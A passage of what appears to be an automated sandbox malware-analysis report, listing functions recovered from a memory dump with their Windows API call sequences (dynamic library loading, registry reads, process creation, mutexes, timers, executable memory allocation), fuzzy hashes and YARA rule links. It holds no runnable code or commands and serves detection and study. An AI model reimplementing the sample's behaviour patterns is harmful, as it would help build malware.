Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

GetModuleHandleA.KERNEL32(?,00000020), ref: 03341B08
GetProcAddress.KERNEL32(00000000,?), ref: 03341B2A
GetProcAddress.KERNEL32(00000000,?), ref: 03341B40
GetProcAddress.KERNEL32(00000000,?), ref: 03341B56
GetProcAddress.KERNEL32(00000000,?), ref: 03341B6C
GetProcAddress.KERNEL32(00000000,?), ref: 03341B82

Part of subcall function 03360B62: memset.NTDLL ref: 03360BE3

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 49c09739948e1ed15a02db65cb60519798595949a8e767dda4b3cb921a21d705
Instruction ID: bfefe53746d069eb7551e1a8f2abfd65734bd0c7fa25f42bc3dc9367dfdbdc10
Opcode Fuzzy Hash: 49c09739948e1ed15a02db65cb60519798595949a8e767dda4b3cb921a21d705
Instruction Fuzzy Hash: FF212AB5900A1AAFD720EFA9CCD4E6BB7FCAF04340B048665E545CB641EB70E9058BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0335379C, Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020), ref: 033537B4
StrChrA.SHLWAPI(00000001,00000020), ref: 033537C5

Part of subcall function 03342D35: lstrlen.KERNEL32(?), ref: 03342D47
Part of subcall function 03342D35: StrChrA.SHLWAPI(?,0000000D), ref: 03342D7F

RtlAllocateHeap.NTDLL(00000000,?), ref: 03353805
memcpy.NTDLL(00000000,?,00000007), ref: 03353832
memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 03353841
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 03353853

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: f1a4e85d6ec7b53ce32484405ed376b333aad0e1f19dcfc70882da8eb3432509
Instruction ID: b47980f21cbe96bef9658f0aea97be237b3905b4081f4545fbdd084e4e15b2be
Opcode Fuzzy Hash: f1a4e85d6ec7b53ce32484405ed376b333aad0e1f19dcfc70882da8eb3432509
Instruction Fuzzy Hash: 0A213976900219BFDB21DF99CCC4F9ABBECAB08794F194151BA04DB251D670EA448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03347BE5, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,00000102,?,?,?,00000000,00000000), ref: 03347C24
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03347C35
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 03347C50
GetLastError.KERNEL32 ref: 03347C66
HeapFree.KERNEL32(00000000,?), ref: 03347C78
HeapFree.KERNEL32(00000000,?), ref: 03347C8D

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: 274701ce79642bd29c7f379053c2d7b34fd0791bfeb87c9dfb2b38e8b7589656
Instruction ID: 82b60ae666844147f99a81cbef861a6daa7318738ad2fc2cb1b02e80742713c1
Opcode Fuzzy Hash: 274701ce79642bd29c7f379053c2d7b34fd0791bfeb87c9dfb2b38e8b7589656
Instruction Fuzzy Hash: 5D112C76901128BBCB22AB96DD88CEFBF7EEB45390F008461F515E1124C7355A95DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03342662, Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?), ref: 03342680
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 033426AE
RtlAllocateHeap.NTDLL(00000000,?), ref: 033426C0
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 033426E5
HeapFree.KERNEL32(00000000,00000000), ref: 03342700
RegCloseKey.ADVAPI32(?), ref: 0334270A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID:
API String ID: 170146033-0
Opcode ID: 92c49ff4dd77d5c9f96611eca4a56a69ce270d92282a0acd8a3ab39bab840f8b
Instruction ID: 9b4d9760fa7db4d57970af7c4c090c5cbeb603bc4fc786bc2e1e3ff765cac681
Opcode Fuzzy Hash: 92c49ff4dd77d5c9f96611eca4a56a69ce270d92282a0acd8a3ab39bab840f8b
Instruction Fuzzy Hash: AF11037A900108FFDB21EB99DDC4CAEBBFDEB48704B1445A6F901E2119D735AA05DF20

Uniqueness

Uniqueness Score: -1.00%

Function 03347AB7, Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,?,?,?,?,?,0336756B,?,00000000,?,00002334), ref: 03347AC8
lstrlen.KERNEL32(?,?,?,?,?,?,0336756B,?,00000000,?,00002334,?,?,?,?,033412DF), ref: 03347ACF
RtlAllocateHeap.NTDLL(00000000,00000020), ref: 03347AE1
_snprintf.NTDLL ref: 03347B07

Part of subcall function 0335241D: memset.NTDLL ref: 03352432
Part of subcall function 0335241D: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 0335246B
Part of subcall function 0335241D: wcstombs.NTDLL ref: 03352475
Part of subcall function 0335241D: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 033524A6
Part of subcall function 0335241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03347B15), ref: 033524D2
Part of subcall function 0335241D: TerminateProcess.KERNEL32(?,000003E5), ref: 033524E8
Part of subcall function 0335241D: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03347B15), ref: 033524FC
Part of subcall function 0335241D: CloseHandle.KERNEL32(?), ref: 0335252F
Part of subcall function 0335241D: CloseHandle.KERNEL32(?), ref: 03352534

_snprintf.NTDLL ref: 03347B3B

Part of subcall function 0335241D: GetLastError.KERNEL32 ref: 03352500
Part of subcall function 0335241D: GetExitCodeProcess.KERNEL32(?,00000001), ref: 03352520

HeapFree.KERNEL32(00000000,00000000,00000000,?), ref: 03347B58

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID:
API String ID: 1481739438-0
Opcode ID: a4f2090619020d788effb8c4f46cac2b64dfb0cd6d822a61976f23852126c0b3
Instruction ID: e7aee26d8ac38065c63298a2b6ad31b7193f847ea3d8455809b342bc336b363d
Opcode Fuzzy Hash: a4f2090619020d788effb8c4f46cac2b64dfb0cd6d822a61976f23852126c0b3
Instruction Fuzzy Hash: 8C11A9B6900218BFCB21AF95DCC4D9E7FADEB08360F148511F9199B261C734AA10CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0335EE1C, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0334FD2F,00000001,00000000,00000000,?,?,0334FD2F,0335DF43,00000057,00000000), ref: 0335EE32
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 0335EE45
lstrcpy.KERNEL32(00000008,0334FD2F), ref: 0335EE67
GetLastError.KERNEL32(033514A6,00000000,00000000,?,?,0334FD2F,0335DF43,00000057,00000000), ref: 0335EE90
HeapFree.KERNEL32(00000000,00000000,?,?,0334FD2F,0335DF43,00000057,00000000), ref: 0335EEA8
CloseHandle.KERNEL32(00000000,033514A6,00000000,00000000,?,?,0334FD2F,0335DF43,00000057,00000000), ref: 0335EEB1

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: ec3c91065058a1b72bd90270519f92dacb91fd0b305f5f4efb944aaf47e0c70d
Instruction ID: 7f25fdfda7850b8f92f4fd4636eb952d656415251cb81f3584d2f8ccb2cd3585
Opcode Fuzzy Hash: ec3c91065058a1b72bd90270519f92dacb91fd0b305f5f4efb944aaf47e0c70d
Instruction Fuzzy Hash: 50117F76504219EFCB10EF65DCC4C9ABBADFB05365B04842AF86AC3220D7349E54CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0334AA75, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

LoadLibraryA.KERNEL32(?,00000000,?,00000014,?,03347D29), ref: 0334AA95
GetProcAddress.KERNEL32(00000000,?), ref: 0334AAB4
GetProcAddress.KERNEL32(00000000,?), ref: 0334AAC9
GetProcAddress.KERNEL32(00000000,?), ref: 0334AADF
GetProcAddress.KERNEL32(00000000,?), ref: 0334AAF5
GetProcAddress.KERNEL32(00000000,?), ref: 0334AB0B

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: c74f6c64b3fe4a5e7353d716d4d2dc3759c11b3d6b984942456ac7648cd40425
Instruction ID: 27fbd0b8da71b6b4854eb2ea78121a278849ad7948aa03f8554a954a787f42a9
Opcode Fuzzy Hash: c74f6c64b3fe4a5e7353d716d4d2dc3759c11b3d6b984942456ac7648cd40425
Instruction Fuzzy Hash: CF113DBA61071B9F9B30EFAADCD0D52B7ECAF052903094526E506CB255EB34F905CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0335E55D, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E56F

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF), ref: 0335E588
GetCurrentThreadId.KERNEL32 ref: 0335E595
GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E5A1
GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03367545,00002334), ref: 0335E5AF
lstrcpy.KERNEL32(00000000), ref: 0335E5D1

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: a0a1b4ee33b785a8ec6e69c49c9032af4cf1d985e7df738a1d2d1b4d10f067fa
Instruction ID: d8dce7ee2cb1f8b4e4eb86be0bb6d2b71eeda298cafdedf462423a3ccfca92c9
Opcode Fuzzy Hash: a0a1b4ee33b785a8ec6e69c49c9032af4cf1d985e7df738a1d2d1b4d10f067fa
Instruction Fuzzy Hash: AA018872900215BF9721AFA69CC8DABBBACEF81740B094425FD05D7104EB64EA018B70

Uniqueness

Uniqueness Score: -1.00%

Function 03357896, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 03357920
lstrlen.KERNEL32(?), ref: 03357951
memcpy.NTDLL(00000008,?,00000001), ref: 03357960
HeapFree.KERNEL32(00000000,00000000), ref: 033579E2

Strings

W, xrefs: 033578A1

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlenmemcpy
String ID: W
API String ID: 379260646-655174618
Opcode ID: 3390fef2bbaf6f5cecf7078c63d27deaa97bac78ce7ae3ba91568a2167bae4e0
Instruction ID: 424b8f4e6e5d30ad59bc88adcdc55b472f498f6f77598adcd1b5d3c07fc6e390
Opcode Fuzzy Hash: 3390fef2bbaf6f5cecf7078c63d27deaa97bac78ce7ae3ba91568a2167bae4e0
Instruction Fuzzy Hash: D741EF7190024A9FCB34DF29CCC4FAABBA9EB04305F48812BFC99C7220C7349486CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0334542B, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 033454D6
FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 03345543
GetLastError.KERNEL32(?,00000000,00000000), ref: 0334554D

Strings

P, xrefs: 03345500
K, xrefs: 03345504

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: BuffersErrorFileFlushLastmemset
String ID: K$P
API String ID: 3817869962-420285281
Opcode ID: 0224992f8e05714c976e8cc54628067eb5d7d8f0ea452e58f39d305f6d6c9ae7
Instruction ID: d216c6ea7ce2e048291454aa82b316e3a7d9173a4454b6325713b2a9a46caf44
Opcode Fuzzy Hash: 0224992f8e05714c976e8cc54628067eb5d7d8f0ea452e58f39d305f6d6c9ae7
Instruction Fuzzy Hash: 76415A70A01745DFEB24CFA8C98467EBBF6FF45601F1889ADD48AD2A50D334EA54CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0335FA48, Relevance: 8.9, APIs: 7, Instructions: 108stringCOMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,0334F914,00000000,?,?,?,0334F914,00000000,?,?,?,?), ref: 0335FA86
lstrlen.KERNEL32(0334F914,?,?,?,0334F914,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0335FAA4
memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,?,74E05520,00000000), ref: 0335FB13
lstrlen.KERNEL32(0334F914,00000000,00000000,?,?,?,0334F914,00000000,?,?,?,?), ref: 0335FB34
lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?,?,?,?,?,?,?,?,74E05520), ref: 0335FB48
memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0335FB51
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0335FB5F

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlenmemcpy$FreeLocal
String ID:
API String ID: 1123625124-0
Opcode ID: 3ab679cc2f66d07a2128104d321c901eb082f2d9bdefc58d827ff784454b8e6f
Instruction ID: 7ab1449b8d7ef1e6de4700e3f9e4c5e7314c1e74f4b2d2ada6b81989f6b4070a
Opcode Fuzzy Hash: 3ab679cc2f66d07a2128104d321c901eb082f2d9bdefc58d827ff784454b8e6f
Instruction Fuzzy Hash: C941D6B680021AEFCF21DF65DD819DB7BA8EF04260B144425FD14A6214E731EE64CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 03356DC4, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 146stringCOMMON

Download Yara Rule

APIs

Part of subcall function 03345E9A: RtlAllocateHeap.NTDLL(00000000,00000001,0335295C), ref: 03345EA6

lstrcpy.KERNEL32(?,00000020), ref: 03356EC1
lstrcat.KERNEL32(?,00000020), ref: 03356ED6
lstrcmp.KERNEL32(00000000,?), ref: 03356EED
lstrlen.KERNEL32(?), ref: 03356F11

Strings

, xrefs: 03356E5A

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
String ID:
API String ID: 3214092121-3916222277
Opcode ID: e93b9b27aef16651707dee502452cd8ad2f1fd1198fd5b67d396506a363e35c7
Instruction ID: cbc307b411f4ab0bd8c94cdcc76a716380b95b797b76557cf351706878388a22
Opcode Fuzzy Hash: e93b9b27aef16651707dee502452cd8ad2f1fd1198fd5b67d396506a363e35c7
Instruction Fuzzy Hash: DF518931A05208EBCB21CF99C9C6AADFBBAEF55315F48915AFC159B211C770AA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0334A608, Relevance: 7.6, APIs: 6, Instructions: 137stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0335CB9E: ExpandEnvironmentStringsW.KERNEL32(74B606E0,00000000,00000000,74B606E0,?,80000001,0334A627,?,80000001,?), ref: 0335CBAF
Part of subcall function 0335CB9E: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 0335CBCC

lstrlenW.KERNEL32(00000000,00000000,74B606E0,?,?,80000001,?), ref: 0334A64E
lstrlenW.KERNEL32(00000008), ref: 0334A655
lstrlenW.KERNEL32(?,?), ref: 0334A671
lstrlen.KERNEL32(?,?,00000000), ref: 0334A6EB
lstrlenW.KERNEL32(?), ref: 0334A6F7
wsprintfA.USER32 ref: 0334A725

Part of subcall function 03360757: HeapFree.KERNEL32(00000000,00000000,033529D3,00000000), ref: 03360763

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen$EnvironmentExpandStrings$FreeHeapwsprintf
String ID:
API String ID: 3384896299-0
Opcode ID: 5074f9de4f057dd1d5642cecebb74fc6b4018be12747824188d07653e6730b16
Instruction ID: 7ddba455be13f2b5d49058dd35b534424830940ae5bc4f61bc533ec6e8387111
Opcode Fuzzy Hash: 5074f9de4f057dd1d5642cecebb74fc6b4018be12747824188d07653e6730b16
Instruction Fuzzy Hash: 4741297A900209AFCB22EFE8DDC4DAE7BBDEF44204B048455F9149B225EB35EA15DF50

Uniqueness

Uniqueness Score: -1.00%

Function 0334A917, Relevance: 7.6, APIs: 6, Instructions: 122stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,03370000,033699D3), ref: 0334A939
lstrlenW.KERNEL32(?,00000000,03370000,033699D3), ref: 0334A94A
lstrlenW.KERNEL32(?,00000000,03370000,033699D3), ref: 0334A95C
lstrlenW.KERNEL32(?,00000000,03370000,033699D3), ref: 0334A96E
lstrlenW.KERNEL32(?,00000000,03370000,033699D3), ref: 0334A980
lstrlenW.KERNEL32(?,00000000,03370000,033699D3), ref: 0334A98C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: ad9070c485cacd079c97d77608f4d7639e1ddcd3556366cdb8fed5245cf00f62
Instruction ID: 8ccfd33cfeb97014b8f66f93eb5fd564c1071442cb8ec334681482bad5162a78
Opcode Fuzzy Hash: ad9070c485cacd079c97d77608f4d7639e1ddcd3556366cdb8fed5245cf00f62
Instruction Fuzzy Hash: B0412C75E4020AAFCB24DFA9CCC0AAEF7F9FF88204B198969D555E7204D774F9448B50

Uniqueness

Uniqueness Score: -1.00%

Function 033421AA, Relevance: 7.6, APIs: 5, Instructions: 102synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0334975C: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 03349768
Part of subcall function 0334975C: SetLastError.KERNEL32(000000B7,?,033421BE), ref: 03349779

WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 033421DE
CloseHandle.KERNEL32(00000000), ref: 033422B6

Part of subcall function 03359F4D: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03359F67
Part of subcall function 03359F4D: CreateWaitableTimerA.KERNEL32(03371248,00000003,?), ref: 03359F84
Part of subcall function 03359F4D: GetLastError.KERNEL32(?,?,03342212,?), ref: 03359F95
Part of subcall function 03359F4D: GetSystemTimeAsFileTime.KERNEL32(?,00000000,03342212,?,?,?,03342212,?), ref: 03359FD5
Part of subcall function 03359F4D: SetWaitableTimer.KERNEL32(?,03342212,00000000,00000000,00000000,00000000,?,?,03342212,?), ref: 03359FF4
Part of subcall function 03359F4D: HeapFree.KERNEL32(00000000,03342212,00000000,03342212,?,?,?,03342212,?), ref: 0335A00A

GetLastError.KERNEL32(?), ref: 0334229F
ReleaseMutex.KERNEL32(00000000), ref: 033422A8

Part of subcall function 0334975C: CreateMutexA.KERNEL32(03371248,00000000,?,?,033421BE), ref: 0334978C

GetLastError.KERNEL32 ref: 033422C3

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
String ID:
API String ID: 1700416623-0
Opcode ID: 273eb517bdbed24792e782e5eef8141ae40e23449aebd70ccec5a03fd3789e1a
Instruction ID: 359f1fff7efa37753c17d4d8cbff241e2be5958fae9f594fd36d3c4ebfb17e60
Opcode Fuzzy Hash: 273eb517bdbed24792e782e5eef8141ae40e23449aebd70ccec5a03fd3789e1a
Instruction Fuzzy Hash: 5B313C7AA003089FCB51EF75DCC496ABBE9FB89315B244965F816EB258E7319900CF50

Uniqueness

Uniqueness Score: -1.00%

Function 03365EF4, Relevance: 7.6, APIs: 5, Instructions: 101memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 03365F0D

Part of subcall function 03348AB5: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,74E04DE0,00000000), ref: 03348ADB

HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,03365BA6,00000000), ref: 03365F4F
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 03365FA1
VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,03365BA6,00000000), ref: 03365FBA

Part of subcall function 03354857: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 03354878
Part of subcall function 03354857: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,03365F40,00000000,00000000,00000000,00000001,?,00000000), ref: 033548BB

GetLastError.KERNEL32(?,00000000,03365BA6,00000000,?,?,?,?,?,?,?,033477C7,?), ref: 03365FF2

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
String ID:
API String ID: 1921436656-0
Opcode ID: ef9d8c3c5a95832702d644d88ee2e7cca08c6bb533f1e72707166e21733652f9
Instruction ID: b8509aea5317e036778951c84f94f3b1b3d688299ec59154f5ac98b81472d204
Opcode Fuzzy Hash: ef9d8c3c5a95832702d644d88ee2e7cca08c6bb533f1e72707166e21733652f9
Instruction Fuzzy Hash: B8316B75A00209EFEB21EF95CCC0AAEBBBCEF09750F008165E905EB258D775A940CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0334E438, Relevance: 7.6, APIs: 5, Instructions: 97memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0334E4BA
lstrcpy.KERNEL32(00000000,?), ref: 0334E4D3
lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,?), ref: 0334E4E0
lstrlen.KERNEL32(033723A8,?,?,?,?,?,00000000,00000000,?), ref: 0334E4F2
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0334E523

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
String ID:
API String ID: 2734445380-0
Opcode ID: 987d381f92a4ff02eafb37d3b94ad2c19a12b72e4d52c204e169ac6a122ec8a2
Instruction ID: 519fb714c2aa8651c30f3e0b46fa5ef2918a971ebbf2484edef99aab77c7689e
Opcode Fuzzy Hash: 987d381f92a4ff02eafb37d3b94ad2c19a12b72e4d52c204e169ac6a122ec8a2
Instruction Fuzzy Hash: DC313772900209EFDB21EF95DCC8EAABBB9EB44350F048564F91596204E778EA15CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 03347E04, Relevance: 7.6, APIs: 5, Instructions: 83memorytimeCOMMON

Download Yara Rule

APIs

Part of subcall function 0335B2AA: lstrlen.KERNEL32(00000000,00000000,?,00000000,0335F438,00000000,00000000,?,?,?,03348FDB,?,?,00000000), ref: 0335B2B6

RtlEnterCriticalSection.NTDLL(03371488), ref: 03347E2E
RtlLeaveCriticalSection.NTDLL(03371488), ref: 03347E41
GetSystemTimeAsFileTime.KERNEL32(?), ref: 03347E52
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03347EBD
InterlockedIncrement.KERNEL32(0337149C), ref: 03347ED4

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
String ID:
API String ID: 3915436794-0
Opcode ID: a5fd6b284a5a09bc2b7814a846344164d529dfc0866f58259a46cfd7052b27e2
Instruction ID: d9a6256f450b52fd80245c0f8860e9d0faafdbf77b83dcd2b24a1fdb5b0872ee
Opcode Fuzzy Hash: a5fd6b284a5a09bc2b7814a846344164d529dfc0866f58259a46cfd7052b27e2
Instruction Fuzzy Hash: D7319F36914606DFC721EF68D8C892AFBF9FB44361F094A19E86583220D734E891CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0334A422, Relevance: 7.6, APIs: 5, Instructions: 83libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,00000000,00000000,0334B065,00000000,74E5F5B0,0335683A,?,?,?,?,?,?,?,033477C7), ref: 0334A442
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0334A457
LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,033477C7,?,?,?,?,?), ref: 0334A473
GetProcAddress.KERNEL32(00000000,?), ref: 0334A488
GetProcAddress.KERNEL32(00000000,?), ref: 0334A49C

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: LibraryLoad$AddressProc
String ID:
API String ID: 1469910268-0
Opcode ID: df29557409e10b63a36cc2093750a1d82c0d7b3bad74693291085d3f6c1dd3e9
Instruction ID: 040bdf52ca139390ade3e11e43ad09c90a6a4e41718a474566d3c64430c85afb
Opcode Fuzzy Hash: df29557409e10b63a36cc2093750a1d82c0d7b3bad74693291085d3f6c1dd3e9
Instruction Fuzzy Hash: 9531857AA602109FC734EF98E8D1A5A73ECFB4A311F01405AE508DB348D734A946CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0334320A, Relevance: 7.6, APIs: 5, Instructions: 81filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E56F
Part of subcall function 0335E55D: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF), ref: 0335E588
Part of subcall function 0335E55D: GetCurrentThreadId.KERNEL32 ref: 0335E595
Part of subcall function 0335E55D: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,03367545,00002334,?,?,?,?,033412DF,?), ref: 0335E5A1
Part of subcall function 0335E55D: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000,?,?,?,?,?,?,03367545,00002334), ref: 0335E5AF
Part of subcall function 0335E55D: lstrcpy.KERNEL32(00000000), ref: 0335E5D1

DeleteFileA.KERNEL32(00000000,000004D2), ref: 0334322D
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 03343236
GetLastError.KERNEL32 ref: 03343240
HeapFree.KERNEL32(00000000,00000000), ref: 033432FF

Memory Dump Source

Source File: 00000003.00000002.754622683.0000000003340000.00000040.00020000.sdmp, Offset: 03340000, based on PE: false

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID:
API String ID: 3543646443-0
Opcode ID: e783b1515b5893fdc564f4d9d727f82b2aa599a0307359938943ca51558c3ead
Instruction ID: 316faae00e2dc0e17bd792b24a005ccfe99a56773b3d0e691b7fccc5a73a71d8
Opcode Fuzzy Hash: e783b1515b5893fdc564f4d9d727f82b2aa599a0307359938943ca51558c3ead
Instruction Fuzzy Hash: 6E21317B945220ABC630F7E5ECC8E8A77DCDF4A321F054111BB46CF244D628EA15DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0334A844, Relevance: 7.6, APIs: 5, Instructions: 75fileCOMMON

